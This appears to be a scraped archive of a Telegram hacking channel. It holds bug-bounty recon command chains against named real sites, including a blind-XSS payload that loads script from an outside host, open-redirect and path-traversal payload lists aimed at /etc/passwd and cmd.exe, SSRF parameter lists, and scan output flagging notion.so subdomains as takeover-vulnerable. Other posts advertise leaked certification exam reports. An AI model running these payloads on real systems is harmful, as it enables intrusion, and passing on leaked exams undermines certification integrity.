Hacking Vidhya
الذهاب إلى القناة على Telegram
We Talk about : Hacking , CTFs , Pentesting , Red & Blue Team etc. Not Allowed: Selling, Carding, Cracking Crypto.
إظهار المزيد385
المشتركون
+224 ساعات
+47 أيام
+2430 أيام
أرشيف المشاركات
' -parameters\n\nsubzy run --targets subdomains.txt --concurrency 100 --hide_fails --verify_ssl\n\npython3 corsy.py -i /home/coffinxp/vaitor/subdomains_alive.txt -t 10 --headers \"User-Agent: GoogleBot\\nCookie: SESSION=Hacked\"\n\nnuclei -list subdomains_alive.txt -t /home/coffinxp/Priv8-Nuclei/cors\n\nnuclei -list ~/vaitor/subdomains_alive.txt -tags cve,osint,tech\n\ncat allurls.txt | gf lfi | nuclei -tags lfi\ncat allurls.txt | gf redirect | openredirex -p /home/coffinxp/openRedirect\n\n@lostsec \nwatch recent video that i uploaded in youtube ❤️","datePublished":"2025-12-27T06:50:00Z","dateModified":"2025-12-27T06:50:00Z","author":{"@type":"Organization","name":"Hacking Vidhya","url":"https://telemetr.io/ar/channels/2519648356-hacking_vidhya","image":"https://img.tlmtr.io/c/2KwbDC/6105187671170205456?ty=x"},"publisher":{"@type":"Organization","name":"Hacking Vidhya","url":"https://telemetr.io/ar/channels/2519648356-hacking_vidhya","image":"https://img.tlmtr.io/c/2KwbDC/6105187671170205456?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":138},{"@type":"InteractionCounter","interactionType":"https://schema.org/LikeAction","userInteractionCount":4},{"@type":"InteractionCounter","interactionType":"https://schema.org/ShareAction","userInteractionCount":6}]}},{"@type":"ListItem","position":9,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/ar/channels/2519648356-hacking_vidhya/posts/617","url":"https://telemetr.io/ar/channels/2519648356-hacking_vidhya/posts/617","mainEntityOfPage":"https://telemetr.io/ar/channels/2519648356-hacking_vidhya/posts/617","headline":"Claim Here !! Limited Enrollments Only ! https://courses.redteamleaders.com/exams/c09a6099-0bc8-4eb4-a4b1-c08…","articleBody":"Claim Here !! Limited Enrollments Only !\n\nhttps://courses.redteamleaders.com/exams/c09a6099-0bc8-4eb4-a4b1-c08d07bb8242\n\nCode: CRTOM100FF","datePublished":"2025-12-26T21:06:47Z","dateModified":"2025-12-26T21:06:47Z","author":{"@type":"Organization","name":"Hacking Vidhya","url":"https://telemetr.io/ar/channels/2519648356-hacking_vidhya","image":"https://img.tlmtr.io/c/2KwbDC/6105187671170205456?ty=x"},"publisher":{"@type":"Organization","name":"Hacking Vidhya","url":"https://telemetr.io/ar/channels/2519648356-hacking_vidhya","image":"https://img.tlmtr.io/c/2KwbDC/6105187671170205456?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":120},{"@type":"InteractionCounter","interactionType":"https://schema.org/ShareAction","userInteractionCount":3}]}},{"@type":"ListItem","position":10,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/ar/channels/2519648356-hacking_vidhya/posts/615","url":"https://telemetr.io/ar/channels/2519648356-hacking_vidhya/posts/615","mainEntityOfPage":"https://telemetr.io/ar/channels/2519648356-hacking_vidhya/posts/615","headline":"Top 25 SSRF parameters 📃 • ?dest={target} • ?redirect={target} • ?uri={target} • ?path={target} • ?continue={…","articleBody":"Top 25 SSRF parameters 📃 \n \n• ?dest={target} \n• ?redirect={target} \n• ?uri={target} \n• ?path={target} \n• ?continue={target} \n• ?url={target} \n• ?window={target} \n• ?next={target} \n• ?data={target} \n• ?reference={target} \n• ?site={target}\n• ?html={target} \n• ?val={target} \n• ?validate={target} \n• ?domain={target} \n• ?callback={target} \n• ?return={target} \n• ?page={target} \n• ?feed={target} \n• ?host={target} \n• ?port={target} \n• ?to={target} \n• ?out={target} \n• ?view={target} \n• ?dir={target}","datePublished":"2025-12-26T11:14:50Z","dateModified":"2025-12-26T11:14:50Z","author":{"@type":"Organization","name":"Hacking Vidhya","url":"https://telemetr.io/ar/channels/2519648356-hacking_vidhya","image":"https://img.tlmtr.io/c/2KwbDC/6105187671170205456?ty=x"},"publisher":{"@type":"Organization","name":"Hacking Vidhya","url":"https://telemetr.io/ar/channels/2519648356-hacking_vidhya","image":"https://img.tlmtr.io/c/2KwbDC/6105187671170205456?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":122},{"@type":"InteractionCounter","interactionType":"https://schema.org/LikeAction","userInteractionCount":4},{"@type":"InteractionCounter","interactionType":"https://schema.org/ShareAction","userInteractionCount":3}]}},{"@type":"ListItem","position":11,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/ar/channels/2519648356-hacking_vidhya/posts/614","url":"https://telemetr.io/ar/channels/2519648356-hacking_vidhya/posts/614","mainEntityOfPage":"https://telemetr.io/ar/channels/2519648356-hacking_vidhya/posts/614","headline":"🔍 OSINT Astra Bot – For Sale • OSINT Telegram Bot • 600+ users • Support channel: 100+ subs 💰 Pricing • Sourc…","articleBody":"🔍 OSINT Astra Bot – For Sale\n\n• OSINT Telegram Bot\n\n• 600+ users\n\n• Support channel: 100+ subs\n💰 Pricing\n\n• Source Code – $50\n\n• Bot Only – $50\n\n• Bot + Source Code – $99\n\n📩 DM for details / demo\n\nDm - @CypherBinu\n\n\n#promo","datePublished":"2025-12-25T17:31:50Z","dateModified":"2025-12-25T17:31:50Z","author":{"@type":"Organization","name":"Hacking Vidhya","url":"https://telemetr.io/ar/channels/2519648356-hacking_vidhya","image":"https://img.tlmtr.io/c/2KwbDC/6105187671170205456?ty=x"},"publisher":{"@type":"Organization","name":"Hacking Vidhya","url":"https://telemetr.io/ar/channels/2519648356-hacking_vidhya","image":"https://img.tlmtr.io/c/2KwbDC/6105187671170205456?ty=x"},"commentCount":1,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":129},{"@type":"InteractionCounter","interactionType":"https://schema.org/LikeAction","userInteractionCount":2},{"@type":"InteractionCounter","interactionType":"https://schema.org/ShareAction","userInteractionCount":1},{"@type":"InteractionCounter","interactionType":"https://schema.org/CommentAction","userInteractionCount":1}]}},{"@type":"ListItem","position":12,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/ar/channels/2519648356-hacking_vidhya/posts/613","url":"https://telemetr.io/ar/channels/2519648356-hacking_vidhya/posts/613","mainEntityOfPage":"https://telemetr.io/ar/channels/2519648356-hacking_vidhya/posts/613","headline":"https://t.me/+Hs3vSOXzJnw2MzM1","articleBody":"https://t.me/+Hs3vSOXzJnw2MzM1","datePublished":"2025-12-25T13:27:49Z","dateModified":"2025-12-25T13:29:03Z","author":{"@type":"Organization","name":"Hacking Vidhya","url":"https://telemetr.io/ar/channels/2519648356-hacking_vidhya","image":"https://img.tlmtr.io/c/2KwbDC/6105187671170205456?ty=x"},"publisher":{"@type":"Organization","name":"Hacking Vidhya","url":"https://telemetr.io/ar/channels/2519648356-hacking_vidhya","image":"https://img.tlmtr.io/c/2KwbDC/6105187671170205456?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":1}]}},{"@type":"ListItem","position":13,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/ar/channels/2519648356-hacking_vidhya/posts/611","url":"https://telemetr.io/ar/channels/2519648356-hacking_vidhya/posts/611","mainEntityOfPage":"https://telemetr.io/ar/channels/2519648356-hacking_vidhya/posts/611","headline":"⚠️ S3 Bucket Recon ⚠️ Source : https://github.com/securitycipher/awsome-websecurity-checklist/blob/main/Mindm…","articleBody":"⚠️ S3 Bucket Recon ⚠️\n\nSource : https://github.com/securitycipher/awsome-websecurity-checklist/blob/main/Mindmaps/S3-Bucket%20Recon.png","datePublished":"2025-12-25T12:55:39Z","dateModified":"2025-12-25T12:55:39Z","author":{"@type":"Organization","name":"Hacking Vidhya","url":"https://telemetr.io/ar/channels/2519648356-hacking_vidhya","image":"https://img.tlmtr.io/c/2KwbDC/6105187671170205456?ty=x"},"publisher":{"@type":"Organization","name":"Hacking Vidhya","url":"https://telemetr.io/ar/channels/2519648356-hacking_vidhya","image":"https://img.tlmtr.io/c/2KwbDC/6105187671170205456?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":136},{"@type":"InteractionCounter","interactionType":"https://schema.org/LikeAction","userInteractionCount":3},{"@type":"InteractionCounter","interactionType":"https://schema.org/ShareAction","userInteractionCount":5}]}},{"@type":"ListItem","position":14,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/ar/channels/2519648356-hacking_vidhya/posts/610","url":"https://telemetr.io/ar/channels/2519648356-hacking_vidhya/posts/610","mainEntityOfPage":"https://telemetr.io/ar/channels/2519648356-hacking_vidhya/posts/610","headline":"CRTPv2 Latest Exam report is out now only in 3000 oversmart people don't try to extract IB NOW: @sttexo","articleBody":"CRTPv2 Latest Exam report is out now\n\nonly in 3000\n\noversmart people don't try to extract\n\nIB NOW: @sttexo","datePublished":"2025-12-25T12:54:21Z","dateModified":"2025-12-25T12:54:21Z","author":{"@type":"Organization","name":"Hacking Vidhya","url":"https://telemetr.io/ar/channels/2519648356-hacking_vidhya","image":"https://img.tlmtr.io/c/2KwbDC/6105187671170205456?ty=x"},"publisher":{"@type":"Organization","name":"Hacking Vidhya","url":"https://telemetr.io/ar/channels/2519648356-hacking_vidhya","image":"https://img.tlmtr.io/c/2KwbDC/6105187671170205456?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":70},{"@type":"InteractionCounter","interactionType":"https://schema.org/LikeAction","userInteractionCount":1},{"@type":"InteractionCounter","interactionType":"https://schema.org/ShareAction","userInteractionCount":4}],"sharedContent":{"@type":"SocialMediaPosting","datePublished":"2025-12-25T11:29:29Z"}}},{"@type":"ListItem","position":15,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/ar/channels/2519648356-hacking_vidhya/posts/608","url":"https://telemetr.io/ar/channels/2519648356-hacking_vidhya/posts/608","mainEntityOfPage":"https://telemetr.io/ar/channels/2519648356-hacking_vidhya/posts/608","headline":"⚡️uro - Using a URL list for security testing can be painful as there are a lot of URLs that have uninteresti…","articleBody":"⚡️uro - Using a URL list for security testing can be painful as there are a lot of URLs that have uninteresting/duplicate content; uro aims to solve that. \n \n🔗github.com/s0md3v/uro","datePublished":"2025-12-24T12:54:02Z","dateModified":"2025-12-24T12:54:02Z","author":{"@type":"Organization","name":"Hacking Vidhya","url":"https://telemetr.io/ar/channels/2519648356-hacking_vidhya","image":"https://img.tlmtr.io/c/2KwbDC/6105187671170205456?ty=x"},"publisher":{"@type":"Organization","name":"Hacking Vidhya","url":"https://telemetr.io/ar/channels/2519648356-hacking_vidhya","image":"https://img.tlmtr.io/c/2KwbDC/6105187671170205456?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":141},{"@type":"InteractionCounter","interactionType":"https://schema.org/LikeAction","userInteractionCount":3},{"@type":"InteractionCounter","interactionType":"https://schema.org/ShareAction","userInteractionCount":5}]}},{"@type":"ListItem","position":16,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/ar/channels/2519648356-hacking_vidhya/posts/607","url":"https://telemetr.io/ar/channels/2519648356-hacking_vidhya/posts/607","mainEntityOfPage":"https://telemetr.io/ar/channels/2519648356-hacking_vidhya/posts/607","headline":"https://t.me/BugBountyTalks?videochat=2062ed463900608807","articleBody":"https://t.me/BugBountyTalks?videochat=2062ed463900608807","datePublished":"2025-12-23T17:56:11Z","dateModified":"2025-12-23T17:56:11Z","author":{"@type":"Organization","name":"Hacking Vidhya","url":"https://telemetr.io/ar/channels/2519648356-hacking_vidhya","image":"https://img.tlmtr.io/c/2KwbDC/6105187671170205456?ty=x"},"publisher":{"@type":"Organization","name":"Hacking Vidhya","url":"https://telemetr.io/ar/channels/2519648356-hacking_vidhya","image":"https://img.tlmtr.io/c/2KwbDC/6105187671170205456?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":126},{"@type":"InteractionCounter","interactionType":"https://schema.org/ShareAction","userInteractionCount":1}]}},{"@type":"ListItem","position":17,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/ar/channels/2519648356-hacking_vidhya/posts/605","url":"https://telemetr.io/ar/channels/2519648356-hacking_vidhya/posts/605","mainEntityOfPage":"https://telemetr.io/ar/channels/2519648356-hacking_vidhya/posts/605","headline":"☄️You can try this effective manual openredirect Bypass☄️ 1. Null-byte injection: - /google.com%00/ - //googl…","articleBody":"☄️You can try this effective manual openredirect Bypass☄️\n\n1. Null-byte injection:\n - /google.com%00/\n - //google.com%00\n \n2. Base64 encoding variations:\n - aHR0cDovL2dvb2dsZS5jb20=\n - aHR0cHM6Ly93d3cuZ29vZ2xlLmNvbQ==\n - //base64:d3d3Lmdvb2dsZS5jb20=/\n \n3. Case-sensitive variations:\n - //GOOGLE.com/\n - //GoOgLe.com/\n\n4. Overlong UTF-8 sequences:\n - %C0%AE%C0%AE%2F (overlong encoding for ../)\n - %C0%AF%C0%AF%2F%2Fgoogle.com\n\n5. Mixed encoding schemes:\n - /%68%74%74%70://google.com\n - //base64:%32%46%32%46%67%6F%6F%67%6C%65%2E%63%6F%6D\n - //base64:%2F%2Fgoogle.com/\n\n6. Alternative domain notations:\n - //google.com@127.0.0.1/\n - //127.0.0.1.xip.io/\n - //0x7F000001/ (hexadecimal IP)\n\n7. Trailing special characters:\n - //google.com/#/\n - //google.com/;&/\n - //google.com/?id=123&//\n\n8. Octal IP address format:\n - http://0177.0.0.1/\n - http://00177.0000.0000.0001/\n\n9. IP address variants:\n - http://3232235777 (decimal notation of an IP)\n - http://0xC0A80001 (hex notation of IP)\n - http://192.168.1.1/\n\n10. Path traversal with encoding:\n - /..%252f..%252f..%252fetc/passwd\n - /%252e%252e/%252e%252e/%252e%252e/etc/passwd\n - /..%5c..%5c..%5cwindows/system32/cmd.exe\n\n11. Alternate protocol inclusion:\n - ftp://google.com/\n - javascript:alert(1)//google.com\n\n12. Protocol-relative URLs:\n - :////google.com/\n - :///google.com/\n\n13. Redirection edge cases:\n - //google.com/?q=//bing.com/\n - //google.com?q=https://another-site.com/\n\n14. IPv6 notation:\n - http://[::1]/\n - http://[::ffff:192.168.1.1]/\n \n15. Double URL encoding:\n - %252f%252fgoogle.com (encoded twice)\n - %255cgoogle.com\n\n16. Combined traversal & encoding:\n - /%2E%2E/%2E%2E/etc/passwd\n - /%2e%2e%5c%2e%2e/etc/passwd\n\n17. Reverse DNS-based:\n - https://google.com.reverselookup.com\n - //lookup-reversed.google.com/\n\n18. Non-standard ports:\n - http://google.com:81/\n - https://google.com:444/\n\n19. Unicode obfuscation in paths:\n - /%E2%80%8Egoogle.com/\n - /%C2%A0google.com/\n\n20. Query parameters obfuscation:\n - //google.com/?q=http://another-site.com/\n - //google.com/?redirect=https://google.com/\n\n21. Using @ symbol for userinfo:\n - https://admin:password@google.com/\n - http://@google.com\n\n22. Combination of userinfo and traversal:\n - https://admin:password@google.com/../../etc/passwd","datePublished":"2025-12-23T12:54:02Z","dateModified":"2025-12-23T12:54:02Z","author":{"@type":"Organization","name":"Hacking Vidhya","url":"https://telemetr.io/ar/channels/2519648356-hacking_vidhya","image":"https://img.tlmtr.io/c/2KwbDC/6105187671170205456?ty=x"},"publisher":{"@type":"Organization","name":"Hacking Vidhya","url":"https://telemetr.io/ar/channels/2519648356-hacking_vidhya","image":"https://img.tlmtr.io/c/2KwbDC/6105187671170205456?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":136},{"@type":"InteractionCounter","interactionType":"https://schema.org/LikeAction","userInteractionCount":3},{"@type":"InteractionCounter","interactionType":"https://schema.org/ShareAction","userInteractionCount":5}]}},{"@type":"ListItem","position":18,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/ar/channels/2519648356-hacking_vidhya/posts/604","url":"https://telemetr.io/ar/channels/2519648356-hacking_vidhya/posts/604","mainEntityOfPage":"https://telemetr.io/ar/channels/2519648356-hacking_vidhya/posts/604","headline":"BLACKHATS99 OG id : @BlackzHere @BLACKHATS99 is a scam id and someone else has claimed the username. So don't…","articleBody":"BLACKHATS99 OG id : @BlackzHere\n\n@BLACKHATS99 is a scam id and someone else has claimed the username. So don't message on that","datePublished":"2025-12-22T17:37:37Z","dateModified":"2025-12-22T17:42:12Z","author":{"@type":"Organization","name":"Hacking Vidhya","url":"https://telemetr.io/ar/channels/2519648356-hacking_vidhya","image":"https://img.tlmtr.io/c/2KwbDC/6105187671170205456?ty=x"},"publisher":{"@type":"Organization","name":"Hacking Vidhya","url":"https://telemetr.io/ar/channels/2519648356-hacking_vidhya","image":"https://img.tlmtr.io/c/2KwbDC/6105187671170205456?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":1}],"sharedContent":{"@type":"SocialMediaPosting","datePublished":"2025-12-22T17:34:34Z"}}},{"@type":"ListItem","position":19,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/ar/channels/2519648356-hacking_vidhya/posts/603","url":"https://telemetr.io/ar/channels/2519648356-hacking_vidhya/posts/603","mainEntityOfPage":"https://telemetr.io/ar/channels/2519648356-hacking_vidhya/posts/603","headline":"https://www.justhacking.com/course/api-hacking/","articleBody":"https://www.justhacking.com/course/api-hacking/","datePublished":"2025-12-22T09:07:28Z","dateModified":"2025-12-22T09:07:28Z","author":{"@type":"Organization","name":"Hacking Vidhya","url":"https://telemetr.io/ar/channels/2519648356-hacking_vidhya","image":"https://img.tlmtr.io/c/2KwbDC/6105187671170205456?ty=x"},"publisher":{"@type":"Organization","name":"Hacking Vidhya","url":"https://telemetr.io/ar/channels/2519648356-hacking_vidhya","image":"https://img.tlmtr.io/c/2KwbDC/6105187671170205456?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":143},{"@type":"InteractionCounter","interactionType":"https://schema.org/LikeAction","userInteractionCount":1},{"@type":"InteractionCounter","interactionType":"https://schema.org/ShareAction","userInteractionCount":3}]}},{"@type":"ListItem","position":20,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/ar/channels/2519648356-hacking_vidhya/posts/600","url":"https://telemetr.io/ar/channels/2519648356-hacking_vidhya/posts/600","mainEntityOfPage":"https://telemetr.io/ar/channels/2519648356-hacking_vidhya/posts/600","headline":"Check out this Christmas game on Telegram 🎄 If you join, we both get gifts! Then you can decide if you wanna…","articleBody":"Check out this Christmas game on Telegram 🎄\n\nIf you join, we both get gifts! Then you can decide if you wanna keep playing or not :)\n\nHere’s the link 👇👇👇","datePublished":"2025-12-22T08:51:29Z","dateModified":"2025-12-22T08:51:29Z","author":{"@type":"Organization","name":"Hacking Vidhya","url":"https://telemetr.io/ar/channels/2519648356-hacking_vidhya","image":"https://img.tlmtr.io/c/2KwbDC/6105187671170205456?ty=x"},"publisher":{"@type":"Organization","name":"Hacking Vidhya","url":"https://telemetr.io/ar/channels/2519648356-hacking_vidhya","image":"https://img.tlmtr.io/c/2KwbDC/6105187671170205456?ty=x"},"image":["https://n1.tlmtr.cc/p/5856361528313973698?ty=l"],"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":138},{"@type":"InteractionCounter","interactionType":"https://schema.org/LikeAction","userInteractionCount":3},{"@type":"InteractionCounter","interactionType":"https://schema.org/ShareAction","userInteractionCount":1}]}}]}




+1
Do you guys know about Gourlex ✔️ Tool ?
📢It is a simple tool that can be used to extract URLs and paths from web pages. It can be helpful during web application assessments to uncover additional targets.
Try the tool : https://github.com/trap-bytes/gourlex
All the Best 👍 Key doing Hunting and be eager for knowledge. I'll help you out
[INF] Current katana version v1.3.0 (latest)
[INF] Started standard crawling for => https://notion.so
https://notion.so
https://www.notion.so
https://www.notion.so
https://www.notion.so
https://www.notion.so/28ffdd083dc3473e9c2da6ec011b58ac
https://www.notion.so
https://www.notion.so/_assets/59853-358b9c3b092d26df.js
https://www.notion.so/_assets/37336-dba7292777f92801.js
https://www.notion.so/_assets/27626-342f9f3e1752e97e.js
https://www.notion.so/_assets/56813-ff069dc98508be2e.js
https://www.notion.so/_assets/app-247ccf49737a4a52.js
https://www.notion.so/_assets/54145-07b22887059e097f.js
https://www.notion.so/_assets/6187-5c30b4d4633a7dce.js
https://www.notion.so/_assets/app-c9c189c0ded15a28.css
https://www.notion.so/_assets/ClientFramework-b7ae4097591a2ff1.js
https://www.notion.so/print.e2ba4c31.css
https://www.notion.so
https://www.notion.so
https://www.notion.so/28ffdd083dc3473e9c2da6ec011b58ac
https://www.notion.so/print.e2ba4c31.css
https://www.notion.so/_assets/app-247ccf49737a4a52.js
https://www.notion.so/28ffdd083dc3473e9c2da6ec011b58ac
[*] Running GF Patterns...
https://www.notion.so/_assets/27626-342f9f3e1752e97e.js
https://www.notion.so/_assets/37336-dba7292777f92801.js
https://www.notion.so/_assets/54145-07b22887059e097f.js
https://www.notion.so/_assets/56813-ff069dc98508be2e.js
https://www.notion.so/_assets/59853-358b9c3b092d26df.js
https://www.notion.so/_assets/6187-5c30b4d4633a7dce.js
https://www.notion.so/_assets/app-247ccf49737a4a52.js
https://www.notion.so/_assets/ClientFramework-b7ae4097591a2ff1.js
[*] Starting Nuclei & Subzy...
[ * ] Fingerprints not found; saving them to "/home/ahmed/subzy/fingerprints.json"
[ * ] Loaded 113 targets
[ * ] Loaded 76 fingerprints
[ No ] HTTPS by default (--https)
[ 10 ] Concurrent requests (--concurrency)
[ No ] Check target only if SSL is valid (--verify_ssl)
[ 10 ] HTTP request timeout (in seconds) (--timeout)
[ Yes ] Show only potentially vulnerable subdomains (--hide_fails)
-----------------
[ VULNERABLE ] - developers.notion.so [ Cargo Collective ]
[ DISCUSSION ] - [Issue #152](https://github.com/EdOverflow/can-i-take-over-xyz/issues/152)
[ DOCUMENTATION ] - [Cargo Support Page](https://support.2.cargocollective.com/Using-a-Third-Party-Domain)
-----------------
-----------------
[ VULNERABLE ] - email.updates.notion.so [ Uptimerobot ]
[ DISCUSSION ] - [Issue #45](https://github.com/EdOverflow/can-i-take-over-xyz/issues/45)
[ DOCUMENTATION ] - [Uptimerobot-Sub-takeover](https://exploit.linuxsec.org/uptimerobot-com-custom-domain-subdomain-takeover/)
-----------------
-----------------
[ VULNERABLE ] - mg.mail.notion.so [ Uptimerobot ]
[ DISCUSSION ] - [Issue #45](https://github.com/EdOverflow/can-i-take-over-xyz/issues/45)
[ DOCUMENTATION ] - [Uptimerobot-Sub-takeover](https://exploit.linuxsec.org/uptimerobot-com-custom-domain-subdomain-takeover/)
-----------------
-----------------
[ VULNERABLE ] - os.mail.dev.notion.so [ Gemfury ]
[ DISCUSSION ] - [Issue #154](https://github.com/EdOverflow/can-i-take-over-xyz/issues/154)
[ DOCUMENTATION ] - [Article](https://khaledibnalwalid.wordpress.com/2020/06/25/gemfury-subdomain-takeover/)
-----------------
🚨 CTF ANNOUNCEMENT — Tomorrow at 2:00 PM 🚨
Hackers, it’s time to prove your skills! 💻🔥
Our Capture The Flag (CTF) starts tomorrow at 2:00 PM, and the challenge is open for all.
🏆 1st Place Reward: Official Certification
🎁 Special Opportunity: All participants who successfully find and submit the correct solution will earn an exclusive invitation to the Official Offline Tournament!
⚙️ How to Participate & Win:
1. Once you find the flag, submit it on the event website (flag submission portal).
2. After successful submission, take a screenshot of your submission confirmation (or a photo).
3. Post that screenshot on your Instagram Story and tag @techno.s3c and @_mr.spaidy_
4. The first participant who submits the flag and uploads the tagged story will be declared the winner.
5. One entry per participant/team — any kind of cheating or rule-breaking will lead to disqualification.
6. The host’s decision will be final.
Sharpen your tools, focus your mind, and be ready to capture the flag before anyone else.
Only the fastest and smartest will take the crown. ⚡️
☠️ Mode :- Single-player
📅 Date: Tomorrow 28 dec
🕑 Time: 2:00 PM IST
📍 Hosted by: @TechnoSec
Website:- spaidy.darkavengers.in
Bug Hunting methodology part 2 by Lostsec :)
----------------------------------------------------------------------------
subfinder -d viator.com -all -recursive > subdomain.txt
cat subdomain.txt | httpx-toolkit -ports 80,443,8080,8000,8888 -threads 200 > subdomains_alive.txt
katana -u subdomains_alive.txt -d 5 -ps -pss waybackarchive,commoncrawl,alienvault -kf -jc -fx -ef woff,css,png,svg,jpg,woff2,jpeg,gif,svg -o allurls.txt
cat allurls.txt | grep -E "\.txt|\.log|\.cache|\.secret|\.db|\.backup|\.yml|\.json|\.gz|\.rar|\.zip|\.config"
cat allurls.txt | grep -E "\.js$" >> js.txt
cat alljs.txt | nuclei -t /home/coffinxp/nuclei-templates/http/exposures/
echo www.viator.com | katana -ps | grep -E "\.js$" | nuclei -t /home/coffinxp/nuclei-templates/http/exposures/ -c 30
dirsearch -u https://www.viator.com -e conf,config,bak,backup,swp,old,db,sql,asp,aspx,aspx~,asp~,py,py~,rb,rb~,php,php~,bak,bkp,cache,cgi,conf,csv,html,inc,jar,js,json,jsp,jsp~,lock,log,rar,old,sql,sql.gz,http://sql.zip,sql.tar.gz,sql~,swp,swp~,tar,tar.bz2,tar.gz,txt,wadl,zip,.log,.xml,.js.,.json
subfinder -d viator.com | httpx-toolkit -silent | katana -ps -f qurl | gf xss | bxss -appendMode -payload '"><script src=https://xss.report/c/coffinxp></script>' -parameters
subzy run --targets subdomains.txt --concurrency 100 --hide_fails --verify_ssl
python3 corsy.py -i /home/coffinxp/vaitor/subdomains_alive.txt -t 10 --headers "User-Agent: GoogleBot\nCookie: SESSION=Hacked"
nuclei -list subdomains_alive.txt -t /home/coffinxp/Priv8-Nuclei/cors
nuclei -list ~/vaitor/subdomains_alive.txt -tags cve,osint,tech
cat allurls.txt | gf lfi | nuclei -tags lfi
cat allurls.txt | gf redirect | openredirex -p /home/coffinxp/openRedirect
@lostsec
watch recent video that i uploaded in youtube ❤️
Claim Here !! Limited Enrollments Only !
https://courses.redteamleaders.com/exams/c09a6099-0bc8-4eb4-a4b1-c08d07bb8242
Code: CRTOM100FF
Top 25 SSRF parameters 📃
• ?dest={target}
• ?redirect={target}
• ?uri={target}
• ?path={target}
• ?continue={target}
• ?url={target}
• ?window={target}
• ?next={target}
• ?data={target}
• ?reference={target}
• ?site={target}
• ?html={target}
• ?val={target}
• ?validate={target}
• ?domain={target}
• ?callback={target}
• ?return={target}
• ?page={target}
• ?feed={target}
• ?host={target}
• ?port={target}
• ?to={target}
• ?out={target}
• ?view={target}
• ?dir={target}🔍 OSINT Astra Bot – For Sale
• OSINT Telegram Bot
• 600+ users
• Support channel: 100+ subs
💰 Pricing
• Source Code – $50
• Bot Only – $50
• Bot + Source Code – $99
📩 DM for details / demo
Dm - @CypherBinu
#promo
⚠️ S3 Bucket Recon ⚠️
Source : https://github.com/securitycipher/awsome-websecurity-checklist/blob/main/Mindmaps/S3-Bucket%20Recon.png
Repost from Exam Market
CRTPv2 Latest Exam report is out now
only in 3000
oversmart people don't try to extract
IB NOW: @sttexo
⚡️uro - Using a URL list for security testing can be painful as there are a lot of URLs that have uninteresting/duplicate content; uro aims to solve that.
🔗github.com/s0md3v/uro
☄️You can try this effective manual openredirect Bypass☄️
1. Null-byte injection:
- /google.com%00/
- //google.com%00
2. Base64 encoding variations:
- aHR0cDovL2dvb2dsZS5jb20=
- aHR0cHM6Ly93d3cuZ29vZ2xlLmNvbQ==
- //base64:d3d3Lmdvb2dsZS5jb20=/
3. Case-sensitive variations:
- //GOOGLE.com/
- //GoOgLe.com/
4. Overlong UTF-8 sequences:
- %C0%AE%C0%AE%2F (overlong encoding for ../)
- %C0%AF%C0%AF%2F%2Fgoogle.com
5. Mixed encoding schemes:
- /%68%74%74%70://google.com
- //base64:%32%46%32%46%67%6F%6F%67%6C%65%2E%63%6F%6D
- //base64:%2F%2Fgoogle.com/
6. Alternative domain notations:
- //google.com@127.0.0.1/
- //127.0.0.1.xip.io/
- //0x7F000001/ (hexadecimal IP)
7. Trailing special characters:
- //google.com/#/
- //google.com/;&/
- //google.com/?id=123&//
8. Octal IP address format:
- http://0177.0.0.1/
- http://00177.0000.0000.0001/
9. IP address variants:
- http://3232235777 (decimal notation of an IP)
- http://0xC0A80001 (hex notation of IP)
- http://192.168.1.1/
10. Path traversal with encoding:
- /..%252f..%252f..%252fetc/passwd
- /%252e%252e/%252e%252e/%252e%252e/etc/passwd
- /..%5c..%5c..%5cwindows/system32/cmd.exe
11. Alternate protocol inclusion:
- ftp://google.com/
- javascript:alert(1)//google.com
12. Protocol-relative URLs:
- :////google.com/
- :///google.com/
13. Redirection edge cases:
- //google.com/?q=//bing.com/
- //google.com?q=https://another-site.com/
14. IPv6 notation:
- http://[::1]/
- http://[::ffff:192.168.1.1]/
15. Double URL encoding:
- %252f%252fgoogle.com (encoded twice)
- %255cgoogle.com
16. Combined traversal & encoding:
- /%2E%2E/%2E%2E/etc/passwd
- /%2e%2e%5c%2e%2e/etc/passwd
17. Reverse DNS-based:
- https://google.com.reverselookup.com
- //lookup-reversed.google.com/
18. Non-standard ports:
- http://google.com:81/
- https://google.com:444/
19. Unicode obfuscation in paths:
- /%E2%80%8Egoogle.com/
- /%C2%A0google.com/
20. Query parameters obfuscation:
- //google.com/?q=http://another-site.com/
- //google.com/?redirect=https://google.com/
21. Using @ symbol for userinfo:
- https://admin:password@google.com/
- http://@google.com
